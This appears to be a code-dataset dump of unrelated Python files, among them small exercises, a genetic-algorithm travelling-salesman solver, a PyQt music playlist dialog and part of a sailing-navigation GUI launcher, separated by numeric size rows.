    print("Jangan sia-siakan masa mudamu ya!!")
elif usia >= 17:
    print("Hihihi... Anda ternyata masih ABG")
    print("Mulai berpikirlah secara dewasa ya!!")
else:
    print("Oalah.. Anda masih anak-anak toh?")
    print("Jangan suka merengek-rengek minta jajan ya!!")
# pause for 3 seconds
time.sleep(3)
# say goodbye
print("OK.. see you later", nama, ".. senang berkenalan denganmu")
| 1,198 | 547 |
# Read n "<age> <name>" lines and print them sorted by ascending age.
# Ties keep input order: the original index is stored as the middle tuple
# element, so sorted() compares it only when ages are equal.
n = int(input())
person = []
for i in range(n):
    # input().split() already yields strings; the old map(str, ...) was a no-op
    a, b = input().split()
    person.append((int(a), i, b))
for age, _, name in sorted(person):
    print(age, name)
"""Miscellaneous functions goes in here.
"""
from os import system
from config import OS
from strings import UtilsStrings as Strings
def clear_console() -> None:
    """Clear the terminal screen using the platform's clear command."""
    # Windows shells use "cls"; every other platform uses "clear".
    system("cls" if OS in ("nt", "dos") else "clear")
def char_input() -> str:
    """Read a single keypress and return it as a one-character string.

    :return: Character pressed.
    """
    if OS in ("nt", "dos"):
        # Windows: msvcrt returns (and echoes) the key immediately.
        import msvcrt
        return msvcrt.getwche()
    # UNIX: temporarily put the terminal into raw mode so one character can
    # be read without waiting for Enter.
    # Solution found on:
    # https://www.semicolonworld.com/question/42804/python-read-a-single-character-from-the-user#comment-21
    import sys
    import termios
    import tty
    descriptor = sys.stdin.fileno()
    saved_attrs = termios.tcgetattr(descriptor)
    try:
        tty.setraw(descriptor)
        pressed = sys.stdin.read(1)
    finally:
        # Always restore the terminal, even if the read fails.
        termios.tcsetattr(descriptor, termios.TCSADRAIN, saved_attrs)
    return pressed
def int_input(message: str, min_val: int, max_val: int) -> int:
    """Prompt until the user enters an integer within [min_val, max_val].

    :param message: Message prompting the user to enter an integer.
    :param min_val: Minimum valid value for the integer.
    :param max_val: Maximum valid value for the integer.
    :return: Validated integer input.
    """
    while True:
        raw = input(message)
        try:
            # Empty input is invalid (and int("") would raise anyway).
            if not raw:
                raise ValueError
            value = int(raw)
            # Input must lie inside the inclusive interval.
            if not (min_val <= value <= max_val):
                raise ValueError
        except ValueError:
            print(Strings.int_warning(min_val, max_val))
        else:
            return value
def text_input(message: str) -> str:
    """Prompt repeatedly until a non-empty string is entered.

    :param message: Message prompting the user to enter a string.
    :return: Validated string input.
    """
    while True:
        answer = input(message)
        if answer:
            return answer
        print(Strings.str_warning)
def bool_input(message: str) -> bool:
    """Ask a yes/no question and return the user's answer as a bool.

    :param message: Message prompting the user to choose between true or false.
    :return: Boolean choice from the user.
    """
    while True:
        print(message)
        answer = char_input().lower()
        print()
        if answer in Strings.truthy:
            return True
        if answer in Strings.falsy:
            return False
        # Unrecognized key: warn and ask again.
        print(Strings.bool_warning)
def stringify(obj_list: list[object]) -> list[str]:
    """Convert list of objects into list of strings.

    :param obj_list: List of objects.
    :return: List of strings.
    """
    # str(obj) is preferred over obj.__str__(): it goes through the type's
    # __str__ (the documented protocol) and also covers objects that only
    # define __repr__.
    return [str(obj) for obj in obj_list]
| 2,888 | 826 |
# -*- coding: utf-8 -*-
"""
文档教程
https://sqxccdy.github.io/odpc/sql_build_model.html
"""
from sqltricks.create import *
from sqltricks.fields import *
from sqltricks.insert import *
from sqltricks.query import *
from sqltricks.drop import *
# Shared log line format for the package; basicConfig is applied at import
# time. NOTE(review): `logging` is not imported here explicitly — presumably
# re-exported by one of the star imports above; verify.
FORMAT = '%(asctime)-15s %(levelname)s::::%(message)s'
logging.basicConfig(format=FORMAT)
| 335 | 136 |
from unittest import TestCase
from microfreshener.core.importer import YMLImporter
from microfreshener.core.analyser.sniffer import SharedPersistencySmellSniffer
from microfreshener.core.analyser.smell import SharedPersistencySmell
from microfreshener.core.model.groups import Edge
class TestSharedPersitence(TestCase):
    """Tests for SharedPersistencySmellSniffer on a sample architecture model."""

    @classmethod
    def setUpClass(cls):
        """Load the YAML model once and create the sniffer shared by all tests."""
        model_path = 'data/tests/test_sniffer_shpr.yml'
        cls.micro_model = YMLImporter().Import(model_path)
        cls.shprSniffer = SharedPersistencySmellSniffer()

    def test_shpr(self):
        """A datastore shared by several clients yields a non-empty smell."""
        smell = self.shprSniffer.snif(self.micro_model["db"])
        self.assertIsInstance(smell, SharedPersistencySmell)
        self.assertFalse(smell.isEmpty())
        self.assertEqual(len(smell.getLinkCause()), 3)
        self.assertEqual(len(smell.getNodeCause()), 0)

    def test_shpr_database(self):
        """A datastore without sharing produces an empty smell."""
        smell = self.shprSniffer.snif(self.micro_model["db1"])
        self.assertTrue(smell.isEmpty())
        self.assertEqual(len(smell.getLinkCause()), 0)
        self.assertEqual(len(smell.getNodeCause()), 0)

    def test_shpr_service_to_database(self):
        """A single service-to-datastore link is not a shared-persistency smell."""
        smell = self.shprSniffer.snif(self.micro_model["db2"])
        self.assertTrue(smell.isEmpty())
""" Given an m x n matrix of non-negative integers representing the height of
each unit cell in a continent, the "Pacific ocean" touches the left and top
edges of the matrix and the "Atlantic ocean" touches the right and bottom
edges.
Water can only flow in four directions (up, down, left, or right) from a cell
to another one with height equal or lower.
Find the list of grid coordinates where water can flow to both the Pacific
and Atlantic ocean.
Example:
Given the following 5x5 matrix:
Pacific ~ ~ ~ ~ ~
~ 1 2 2 3 (5) *
~ 3 2 3 (4)(4) *
~ 2 4 (5) 3 1 *
~ (6)(7) 1 4 5 *
~ (5) 1 1 2 4 *
* * * * * Atlantic
Return:
[[0, 4], [1, 3], [1, 4], [2, 2], [3, 0], [3, 1], [4, 0]] (positions with
parentheses in above matrix)
IDEA:
find the points which are peaks and meeting points in the same time
use marker +1 for one area and marker +2 for another one; the meeting point will have 1+2 == 3
"""
class Solution417:
    """LeetCode 417 — Pacific Atlantic Water Flow (was an empty placeholder)."""

    def pacificAtlantic(self, matrix):
        """Return the [row, col] cells from which water can reach both oceans.

        Walks "uphill" from each ocean's border cells (water flows downhill,
        so reachability is computed in reverse) and intersects the two
        reachable sets.

        :param matrix: rectangular list of lists of non-negative heights
        :return: sorted list of [row, col] pairs reaching both oceans
        """
        if not matrix or not matrix[0]:
            return []
        rows, cols = len(matrix), len(matrix[0])

        def climb(starts):
            # Iterative flood-fill moving only to neighbours of equal or
            # greater height (reverse of the downhill flow rule).
            seen = set(starts)
            stack = list(starts)
            while stack:
                r, c = stack.pop()
                for nr, nc in ((r + 1, c), (r - 1, c), (r, c + 1), (r, c - 1)):
                    if (0 <= nr < rows and 0 <= nc < cols
                            and (nr, nc) not in seen
                            and matrix[nr][nc] >= matrix[r][c]):
                        seen.add((nr, nc))
                        stack.append((nr, nc))
            return seen

        # Pacific touches the top and left edges; Atlantic the bottom and right.
        pacific = climb([(r, 0) for r in range(rows)]
                        + [(0, c) for c in range(cols)])
        atlantic = climb([(r, cols - 1) for r in range(rows)]
                         + [(rows - 1, c) for c in range(cols)])
        return [[r, c] for r, c in sorted(pacific & atlantic)]
| 1,112 | 386 |
import random
import time
from functools import reduce
import hashlib
from collections import defaultdict
import numpy as np
from numba import njit
from numba.core import types
from numba.typed import Dict
from geneal.applications.tsp.mutation_strategies import MutationStrategies
from geneal.genetic_algorithms import ContinuousGenAlgSolver
from geneal.utils.exceptions import InvalidInput
# Strategies that "select_any_mutation" picks from at random.
# NOTE(review): intentionally a subset of `allowed_mutations` — confirm.
mutation_options = {"random_swap", "random_inversion", "2-opt"}
# Every mutation strategy accepted by the solver's constructor.
allowed_mutations = {
    "2-opt",
    "random_swap",
    "random_inversion",
    "random_gene_nearest_neighbour",
    "worst_gene_random",
    "worst_gene_nearest_neighbour",
    "select_any_mutation",
}
@njit
def fitness_function(individual, edges):
    """
    Implements the logic that calculates the fitness
    measure of an individual. It sums all the costs of going
    from node to node in the tour.

    Compiled with numba's @njit; `edges` must be a numba typed Dict keyed by
    (int64, int64) tuples (see convert_to_typed_dict).

    :param individual: chromosome of genes representing an individual
    :param edges: dictionary with cost between all nodes
    :return: the fitness of the individual (negative tour length, so higher
        fitness means a shorter tour)
    """
    total_length = 0
    for i in range(individual.shape[0] - 1):
        total_length += edges[(individual[i], individual[i + 1])]
    # Close the tour: cost of the edge between the last and the first city.
    total_length += edges[(individual[0], individual[-1])]
    return -round(total_length, 2)
def convert_to_typed_dict(G):
    """Copy the graph's edge weights into a numba typed Dict.

    Both (u, v) and (v, u) keys are inserted so lookups succeed regardless of
    traversal direction inside the @njit fitness function.
    NOTE(review): assumes an undirected weight model — confirm for directed graphs.
    """
    edges_dict = Dict.empty(
        key_type=types.UniTuple(types.int64, 2), value_type=types.float64
    )
    edges_dict.update({(edge[1], edge[0]): G.edges[edge]["weight"] for edge in G.edges})
    edges_dict.update({(edge[0], edge[1]): G.edges[edge]["weight"] for edge in G.edges})
    return edges_dict
class TravellingSalesmanProblemSolver(MutationStrategies, ContinuousGenAlgSolver):
    def __init__(
        self,
        graph,
        mutation_strategy: str = "2-opt",
        n_searches: int = 1,
        numba_speedup: bool = False,
        *args,
        **kwargs,
    ):
        """Set up a GA-based TSP solver over `graph`.

        :param graph: graph whose nodes are cities and whose edges carry a
            "weight" attribute.
        :param mutation_strategy: one of `allowed_mutations`.
        :param n_searches: forwarded to MutationStrategies.
        :param numba_speedup: if True, shadow the bound fitness method with
            the @njit-compiled module-level function.
        :raises InvalidInput: if `mutation_strategy` is not allowed.
        """
        # Normalizes kwargs in place (forces 2 crossover points, clamps n_genes).
        self.check_input(kwargs, graph)
        MutationStrategies.__init__(self, n_searches=n_searches)
        ContinuousGenAlgSolver.__init__(self, n_crossover_points=2, *args, **kwargs)
        if mutation_strategy not in allowed_mutations:
            raise (InvalidInput(f"{mutation_strategy} is an invalid mutation strategy"))
        if numba_speedup:
            # Closure over the typed edge dict replaces the instance method.
            edges_dict = convert_to_typed_dict(graph)
            self.fitness_function = lambda individual: fitness_function(
                individual, edges_dict
            )
        self.G = graph
        self.mutation_strategy = mutation_strategy
        # Cumulative seconds spent in fitness evaluation (non-numba path only).
        self.fitness_time = 0
        # Memoized fitness values keyed by sha1 of the chromosome bytes.
        self.chromosomes = defaultdict(int)
@staticmethod
def check_input(kwargs, graph):
if "n_crossover_points" in kwargs:
if kwargs["n_crossover_points"] != 2:
print("Defaulting 'n_crossover_points' to 2")
kwargs.pop("n_crossover_points")
if "n_genes" in kwargs:
if kwargs["n_genes"] > len(graph.nodes):
print(
f"'n_genes' can't be larger than the nodes in the graph. The number of genes "
f"will default to {len(graph.nodes)}."
)
kwargs["n_genes"] = len(graph.nodes)
else:
kwargs["n_genes"] = len(graph.nodes)
return kwargs
def fitness_function(self, individual):
"""
Implements the logic that calculates the fitness
measure of an individual. It sums all the costs of going
from node to node in the tour.
:param individual: chromosome of genes representing an individual
:return: the fitness of the individual
"""
start_time = time.time()
arr_hash = hashlib.sha1(individual).hexdigest()
if arr_hash in self.chromosomes:
res = self.chromosomes[arr_hash]
else:
res = reduce(
lambda total_length, city_pair: total_length
+ self.G.edges[(city_pair[0], city_pair[1])]["weight"],
zip(individual, individual[1:]),
0,
)
res += self.G.edges[(individual[0], individual[-1])]["weight"]
res = -round(res, 2)
self.chromosomes[arr_hash] = res
self.fitness_time += time.time() - start_time
return res
def initialize_population(self):
"""
Initializes the population of the problem. It creates a
matrix of size (pop_size x n_genes) containing permutations of the nodes
on each row.
:return: a numpy array with a randomized initialized population
"""
population = np.repeat(
np.arange(1, self.n_genes + 1)[np.newaxis, :], self.pop_size, axis=0
)
return np.array(list(map(lambda x: np.random.permutation(x), population)))
def create_offspring(self, first_parent, sec_parent, crossover_pt, _):
"""
Creates an offspring from 2 parents. It performs an OX crossover, which
combines genes from each parent, but maintaining the nodes order of the parents.
http://www.inf.tu-dresden.de/content/institutes/ki/cl/study/summer14/pssai/slides/GA_for_TSP.pdf
:param first_parent: first parent's chromosome
:param sec_parent: second parent's chromosome
:param crossover_pt: points at which to perform the crossover
:return: the resulting offspring.
"""
reordered_sec_parent = np.roll(sec_parent, -crossover_pt[1])
new_arr = first_parent[crossover_pt[0] : crossover_pt[1]]
new_arr = np.append(new_arr, reordered_sec_parent)
_, idx = np.unique(new_arr, return_index=True)
res = np.roll(new_arr[np.sort(idx)], crossover_pt[0])
if res.shape[0] != 30:
a = 1
return res
def mutate_population(self, population, n_mutations, **kwargs):
"""
Mutates the population using a 2-opt rule hybrid. It selects the number of rows
on which mutation will be applied, and then a applies a local search 2-opt rule
to those rows.
:param population: the population at a given iteration
:param n_mutations: number of mutations to be performed. This number is
calculated according to mutation_rate, but can be adjusted as needed inside this function
:return: the mutated population
"""
adjusted_n_mutations = np.ceil(n_mutations / self.n_genes).astype(int)
if adjusted_n_mutations == 0:
return population
mutation_rows = self.get_mutation_rows(adjusted_n_mutations, population)
mutation_strategy = self.mutation_strategy
if "mutation_strategy" in kwargs:
mutation_strategy = kwargs["mutation_strategy"]
if mutation_strategy == "2-opt":
return self.two_opt_mutation(population, mutation_rows)
elif mutation_strategy == "random_swap":
mutation_cols = self.get_mutation_cols(adjusted_n_mutations, population)
return self.random_swap_mutation(population, mutation_rows, mutation_cols)
elif mutation_strategy == "random_gene_around_nearest_neighbour":
return self.random_gene_around_nearest_neighbour_mutation(
population, mutation_rows
)
elif mutation_strategy == "random_gene_nearest_neighbour":
return self.random_gene_nearest_neighbour_mutation(
population, mutation_rows
)
elif mutation_strategy == "worst_gene_random":
return self.worst_gene_random_mutation(population, mutation_rows)
elif mutation_strategy == "worst_gene_nearest_neighbour":
return self.worst_gene_nearest_neighbour_mutation(population, mutation_rows)
elif mutation_strategy == "random_inversion":
return self.random_inversion_mutation(
population,
mutation_rows,
np.random.choice(int(population.shape[1] / 2), 1)[0],
)
elif mutation_strategy == "select_any_mutation":
selected_strategy = random.sample(mutation_options, 1)[0]
return self.mutate_population(
population, n_mutations, **{"mutation_strategy": selected_strategy}
)
else:
raise (InvalidInput(f"{mutation_strategy} is an invalid mutation strategy"))
    def find_worst_gene(self, chromosome):
        """Return the index of the gene with the largest combined incident cost.

        For each position the weights of the two tour edges touching that city
        are summed, treating the tour as a cycle (the first and last genes use
        the wrap-around edge). The position with the largest sum is "worst".
        """
        distances = [
            # First gene: edge from the last city plus edge to the second city.
            self.G.edges[(chromosome[-1], chromosome[0])]["weight"]
            + self.G.edges[(chromosome[0], chromosome[1])]["weight"],
            *[
                # Interior genes: edges to the previous and the next city.
                self.G.edges[(city_pair[0], city_pair[1])]["weight"]
                + self.G.edges[(city_pair[1], city_pair[2])]["weight"]
                for city_pair in zip(chromosome, chromosome[1:], chromosome[2:])
            ],
            # Last gene: edge from the second-to-last city plus the wrap-around.
            self.G.edges[(chromosome[-2], chromosome[-1])]["weight"]
            + self.G.edges[(chromosome[-1], chromosome[0])]["weight"],
        ]
        worst_gene = np.argmax(distances)
        return worst_gene
| 9,068 | 2,839 |
class Solution(object):
    def combinationSum4(self, nums, target):
        """Count ordered sequences of nums (with repetition) summing to target.

        Bottom-up DP: dp[i] is the number of sequences summing to i, so
        dp[i] = sum(dp[i - n] for each usable n). `range` replaces the
        Python-2-only `xrange`, keeping the method portable to Python 3
        with identical behavior.

        :type nums: List[int]
        :type target: int
        :rtype: int
        """
        dp = [0] * (target + 1)
        dp[0] = 1  # one way to reach 0: the empty sequence
        for i in range(1, target + 1):
            dp[i] = sum(dp[i - n] for n in nums if n <= i)
        return dp[target]
# Quick manual check (Python 2 print-statement syntax; this module targets
# Python 2 as written).
nums = [1, 2, 3]
target = 4
print Solution().combinationSum4(nums, target)
from PyQt5 import QtGui
from PyQt5.QtCore import Qt, QEvent, QModelIndex
from PyQt5.QtGui import QPixmap, QColor, QIcon, QCursor, QPainter, QPen
from PyQt5.QtWidgets import QWidget, QTableWidgetItem, \
QAction, QMenu, QLabel, QWidgetAction, QHBoxLayout
from src.Apps import Apps
from src.model.MusicList import MusicList
from src.ui.PlaylistDialogUI import Ui_Form
from src.util import util
class PlayListDialog(QWidget, Ui_Form):
    """Slide-in panel showing the current play queue.

    Renders queued songs in a table, supports double-click playback, jumping
    to the music list a song came from, and a right-click context menu
    (play / collect to list / open file location / delete).
    """

    def __init__(self, parent, ):
        QWidget.__init__(self)
        Ui_Form.__init__(self)
        self.setupUi(self)
        self.setParent(parent)
        # Application-wide shared services and state.
        self.musicListService = Apps.musicListService
        self.player = Apps.player
        self.playlist = Apps.playlist
        self.__init_ui()
        self.__init_table_widget_ui()
        self.__set_table_widget_width()
        self.__initConnect()

    def __initConnect(self):
        """Connect playlist and table-widget signals to their handlers."""
        self.playlist.changed.connect(self.onPlaylistChanged)
        self.pushButton_2.clicked.connect(self.onClearBtnClicked)
        self.tableWidget.cellPressed.connect(self.open_music_list)
        self.tableWidget.doubleClicked.connect(self.onTableDoubleClicked)
        self.tableWidget.customContextMenuRequested.connect(self.onRightClick)

    def onPlaylistChanged(self):
        """Rebuild the table whenever the playlist contents change."""
        playlist = self.playlist
        self.setGeometry(self.parent().width() - 580, 150, 580,
                         self.parent().height() - 150 - 48)
        self.tableWidget.clearContents()
        self.tableWidget.setRowCount(playlist.size())
        self.label.setText("共%d首" % playlist.size())
        icon = QIcon("./resource/image/链接.png")
        for i in range(playlist.size()):
            # NOTE(review): self.btn_link is reassigned each iteration, so the
            # attribute ends up referring only to the last row's label.
            self.btn_link = QLabel(self.tableWidget)
            self.btn_link.setStyleSheet("background-color:rgba(0,0,0,0)")
            self.btn_link.setPixmap(QPixmap("./resource/image/链接.png"))
            self.btn_link.setAlignment(Qt.AlignCenter)
            self.btn_link.setCursor(Qt.PointingHandCursor)
            # self.btn_link.installEventFilter(self)
            # icon_item = QTableWidgetItem()
            # icon_item.setIcon(icon)
            music = playlist.get(i)
            self.tableWidget.setItem(i, 0, QTableWidgetItem("\t"))
            self.tableWidget.setItem(i, 1, QTableWidgetItem(music.title))
            self.tableWidget.setItem(i, 2, QTableWidgetItem(music.artist))
            # self.tableWidget.setItem(i, 3, icon_item)
            self.tableWidget.setCellWidget(i, 3, self.btn_link)
            self.tableWidget.setItem(i, 4, QTableWidgetItem(util.format_time(music.duration)))
        # Mark the currently playing row with a speaker icon.
        icon_label = QLabel()
        icon_label.setPixmap(QPixmap("./resource/image/musics_play.png"))
        icon_label.setAlignment(Qt.AlignRight | Qt.AlignVCenter)
        icon_label.setCursor(Qt.PointingHandCursor)
        self.tableWidget.setCellWidget(playlist.getIndex(), 0, icon_label)
        # When the row count is 13, maximum=0; row=14 -> maximum=1,
        # row=15 -> maximum=2, row=16 -> maximum=3
        # 15-27
        # print("table widget height: ", self.tableWidget.height())
        # print("height: ", self.tableWidget.verticalScrollBar().height())
        # print("maximum: ", self.tableWidget.verticalScrollBar().maximum())
        # print("value:", self.tableWidget.verticalScrollBar().value())
        # print("position:", self.tableWidget.verticalScrollBar().sliderPosition())
        # self.tableWidget.verticalScrollBar().setSliderPosition(self.tableWidget.verticalScrollBar().maximum() / 2)

    def onTableDoubleClicked(self, modelIndex: QModelIndex):
        """Play the song on the row that was double-clicked."""
        index = modelIndex.row()
        self.playlist.setIndex(index)
        self.player.play(self.playlist.getCurrentMusic())
        self.tableWidget.selectRow(index)

    def onClearBtnClicked(self):
        """Clear button handler: empty the queue and stop playback."""
        self.playlist.clear()
        self.player.stop()

    def open_music_list(self, row, column):
        """If the link-button column was clicked, navigate to the song's music list."""
        # Only the link button column (3) triggers navigation.
        if column == 3:
            music = self.playlist.get(row)
            music_list = self.musicListService.get(music.mid)
            self.parent().navigation.setFocus()
            self.parent().navigation.setCurrentRow(2)
            items = self.parent().navigation.findItems(music_list.name, Qt.MatchCaseSensitive)
            item = None
            for item_ in items:
                data = item_.data(Qt.UserRole)
                if music.mid == data.id:
                    item = item_
                    break
            if item is not None:
                data = item.data(Qt.UserRole)
                self.parent().navigation.setCurrentItem(item)
                self.parent().updateMusicList(data.id)
                # Local music list (id 0)
                if data.id == 0:
                    self.parent().stackedWidget_2.setCurrentWidget(self.parent().local_music_page)
                # Any other music list
                else:
                    self.parent().stackedWidget_2.setCurrentWidget(self.parent().music_list_detail)
                self.parent().show_musics_data()
            self.hide()

    def onRightClick(self):
        """Build and show the context menu for the selected playlist rows."""
        self.play_list_menu.clear()
        act1 = self.create_widget_action("./resource/image/nav-播放.png", "播放(Enter)")
        act2 = QAction("收藏到歌单(Ctrl+S)", self)
        act3 = self.create_widget_action("./resource/image/打开文件.png", "打开文件所在目录")
        act4 = self.create_widget_action("./resource/image/删除.png", "从列表中删除(Delete)")
        self.play_list_menu.addAction(act1)
        self.play_list_menu.addAction(act2)
        # Get the selected items (one per cell, all columns included).
        items = self.tableWidget.selectedItems()
        # Row numbers of the selection.
        rows = set()
        for item in items:
            rows.add(item.row())
        musics = []
        for row in rows:
            music = self.playlist.get(row)
            musics.append(music)
        # "Open file location" only makes sense for a single row.
        if len(rows) == 1:
            self.play_list_menu.addAction(act3)
        # Attach the sub-menu to act2.
        self.create_collect_menu(musics)
        act2.setMenu(self.collect_menu)
        self.play_list_menu.addMenu(self.collect_menu)
        self.play_list_menu.addSeparator()
        self.play_list_menu.addAction(act4)
        act1.triggered.connect(lambda: self.parent().on_act_play(musics))
        act3.triggered.connect(lambda: self.parent().on_act_open_file(musics))
        act4.triggered.connect(lambda: self.onActDel(musics))
        self.play_list_menu.exec(QCursor.pos())

    def onActDel(self, musics: list):
        """Remove the given songs from the queue; skip ahead if one was playing."""
        cur = self.playlist.getCurrentMusic()
        playing = False
        for music in musics:
            if music.path == cur.path and music.mid == cur.mid:
                playing = True
        for music in musics:
            self.playlist.remove(music)
        if playing:
            self.parent().nextMusic()

    def create_collect_menu(self, musics: list):
        """Populate the 'collect to music list' sub-menu with all user lists."""
        self.collect_menu.clear()
        act0 = self.create_widget_action("./resource/image/添加歌单.png", "创建新歌单")
        self.collect_menu.addAction(act0)
        self.collect_menu.addSeparator()
        mls = list(filter(lambda ml: ml.id != MusicList.DEFAULT_ID, self.musicListService.list_(MusicList())))
        for music_list in mls:
            act = self.create_widget_action("./resource/image/歌单.png", music_list.name, music_list)
            self.collect_menu.addAction(act)
            act.triggered.connect(lambda: self.parent().on_acts_choose(musics))

    def __init_ui(self):
        """Apply static styling: frameless window, tab bar, buttons, menus."""
        self.setWindowFlag(Qt.FramelessWindowHint)
        self.tabWidget.setCurrentWidget(self.play_list)
        self.tabWidget.tabBar().setCursor(Qt.PointingHandCursor)
        self.tabWidget.setStyleSheet("QTabWidget::pane{border-top: 1px solid #e1e1e2;}" +
                                     "QTabWidget::tab-bar{alignment:center;height:46px;}" +
                                     "QTabBar::tab{height:26px;width:128px;border-radius:4px;}" +
                                     "QTabBar::tab:selected{background-color:#7c7d86;color:#ffffff;}" +
                                     "QTabBar::tab:!selected{background-color:#ffffff;color:#888888;}" +
                                     "QTabBar::tab:!selected:hover{background:#f5f5f7;color:#666666;}"
                                     )
        self.widget.setStyleSheet(
            "background:#f9f9f9;border:none;border-bottom:1px solid #efefef;border-left:1px solid #c3c3c4;")
        self.label.setStyleSheet("border:none")
        self.label_2.setStyleSheet("border:none")
        self.widget_2.setStyleSheet(
            "background:#f9f9f9;border:none;border-bottom:1px solid #efefef;border-left:1px solid #c3c3c4;")
        self.pushButton.setStyleSheet("QPushButton{color:#666666;border:none;}QPushButton:hover{color:#444444;}")
        self.pushButton_2.setStyleSheet("QPushButton{color:#666666;border:none;}QPushButton:hover{color:#444444;}")
        self.pushButton.setCursor(Qt.PointingHandCursor)
        self.pushButton_2.setCursor(Qt.PointingHandCursor)
        # Right-click context menu for the play list.
        self.play_list_menu = QMenu()
        # Sub-menu shown when hovering over "collect to music list".
        self.collect_menu = QMenu()
        self.play_list_menu.setStyleSheet(
            "QMenu{background-color:#fafafc;border:1px solid #c8c8c8;font-size:13px;width:214px;}" +
            "QMenu::item {height:36px;padding-left:44px;padding-right:60px;}" +
            "QMenu::item:selected {background-color:#ededef;}" +
            "QMenu::separator{background-color:#ededef;height:1px}")
        self.collect_menu.setStyleSheet(
            "QMenu{background-color:#fafafc;border:1px solid #c8c8c8;font-size:13px;width:214px;}" +
            "QMenu::item {height:36px;padding-left:44px;padding-right:60px;}" +
            "QMenu::item:selected {background-color:#ededef;}" +
            "QMenu::separator{background-color:#ededef;height:1px}")

    def __init_table_widget_ui(self):
        """Configure the playlist table's columns and styling."""
        self.tableWidget.setColumnCount(5)
        self.tableWidget.setHorizontalHeaderLabels(["", "音乐标题", "歌手", "专辑", "时长"])
        self.tableWidget.horizontalHeader().setHidden(True)
        self.tableWidget.setStyleSheet("QTableWidget{border:none;border-left:1px solid #c0c0c1;background:#fafafa;}" +
                                       "QTableWidget::item::selected{background-color:#e3e3e5}")

    def __set_table_widget_width(self):
        """Distribute column widths as fixed fractions of the dialog width."""
        self.tableWidget.setColumnWidth(0, self.width() * 0.03)
        self.tableWidget.setColumnWidth(1, self.width() * 0.63)
        self.tableWidget.setColumnWidth(2, self.width() * 0.17)
        self.tableWidget.setColumnWidth(3, self.width() * 0.05)
        self.tableWidget.setColumnWidth(4, self.width() * 0.12)

    def create_widget_action(self, icon, text, data=None):
        """Build a QWidgetAction rendering an icon and a text label side by side."""
        act = QWidgetAction(self)
        act.setText(text)
        if data is not None:
            act.setData(data)
        widget = QWidget(self)
        layout = QHBoxLayout()
        layout.setContentsMargins(13, -1, -1, 11)
        layout.setSpacing(13)
        lb_icon = QLabel(widget)
        lb_icon.resize(18, 18)
        lb_text = QLabel(text, widget)
        if icon != "":
            lb_icon.setPixmap(QPixmap(icon))
        widget.setStyleSheet("QWidget:hover{background:#ededef} QWidget{color:#000000;font-size:13px;}")
        layout.addWidget(lb_icon)
        layout.addWidget(lb_text)
        layout.addStretch()
        widget.setLayout(layout)
        act.setDefaultWidget(widget)
        return act

    def eventFilter(self, QObject, QEvent_):
        """Intended to catch clicks on the link label; currently a no-op."""
        if self.btn_link == QObject:
            if QEvent_.type() == QEvent.MouseButtonPress:
                item = self.tableWidget.currentItem()
                if item is not None:
                    pass
        return super().eventFilter(QObject, QEvent_)

    def paintEvent(self, QPaintEvent):
        """Paint the dialog's border lines and the tab-bar header background."""
        # Draw the border lines.
        paint = QPainter()
        paint.begin(self)
        pen = QPen()
        pen.setColor(QColor("#c3c3c4"))
        paint.setPen(pen)
        paint.drawLine(0, 0, self.width(), 0)
        paint.drawLine(0, 0, 0, self.tabWidget.tabBar().height())
        # Draw the header background.
        brush = QtGui.QBrush(QColor("#f4f4f6"))
        brush.setStyle(Qt.SolidPattern)
        paint.setBrush(brush)
        paint.drawRect(0, 0, self.width(), self.tabWidget.tabBar().height())
| 12,188 | 4,100 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# vim: ts=2 sw=2 et ai
###############################################################################
# Copyright (c) 2012,2014 Andreas Vogel andreas@wellenvogel.net
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
#
###############################################################################
import optparse
import sys
import os
import wx
from avnav_gui_design import *
# Default version label; overwritten by the generated avnav_gui_version
# module when a release build provides one.
AVNAV_VERSION="development"
try:
  from avnav_gui_version import AVNAV_VERSION
except:
  pass
import subprocess
import re
__author__ = 'andreas'
class AvnavGui(Avnav):
  """Main GUI window: runs the chart converter and starts/stops the AvNav server.

  Both children run as external xterm-wrapped subprocesses and are polled by
  a wx timer every 500ms to keep the button/label state current.
  """
  def __init__(self, *args, **kwds):
    Avnav.__init__(self, *args, **kwds)
    self.defaultOut=os.path.join(os.path.expanduser("~"),"AvNavCharts")
    self.serverbase=os.path.join(os.path.expanduser("~"),"avnav")
    self.txLogfile.SetValue(os.path.join(self.defaultOut,"avnav-chartconvert.log"))
    self.outputDir.SetValue(self.defaultOut)
    self.server=None
    self.serverRunning=False
    self.converter=None
    # Poll the child processes twice a second (see OnTimer).
    self.timer=wx.Timer(self,1)
    self.Bind(wx.EVT_TIMER, self.OnTimer)
    self.timer.Start(500)
    self.urlmap=None
    self.SetTitle("Avnav - %s"%(AVNAV_VERSION))
    pass
  def setServerBase(self, base):
    """Set the directory used as the server's working base."""
    self.serverbase=base
  def setUrlMap(self, base):
    """Set an optional URL map handed to the server via -u."""
    self.urlmap = base
  def btExitClicked(self, event):
    """Exit button: stop both children and close the window."""
    self.terminateServer()
    self.terminateConverter()
    self.Close(True)
  def getBaseDir(self):
    """Return the directory containing this script."""
    dir=os.path.join(os.path.dirname(os.path.realpath(__file__)))
    return dir
  def doStartServer(self):
    """Start avnav_server.py in an xterm unless it is already running."""
    if self.checkServerRunning():
      return
    script=os.path.join(self.getBaseDir(),"..","server","avnav_server.py")
    args=["xterm","-hold","-e",sys.executable,script,"-c",os.path.join(self.outputDir.GetValue(),"out")]
    if self.urlmap is not None:
      args.append("-u")
      args.append(self.urlmap)
    args.append("-w")
    args.append(self.serverbase)
    args.append(os.path.join(self.serverbase,"avnav_server.xml"))
    self.server=subprocess.Popen(args,cwd=self.getBaseDir())
    self.checkServerRunning()
  def terminateServer(self):
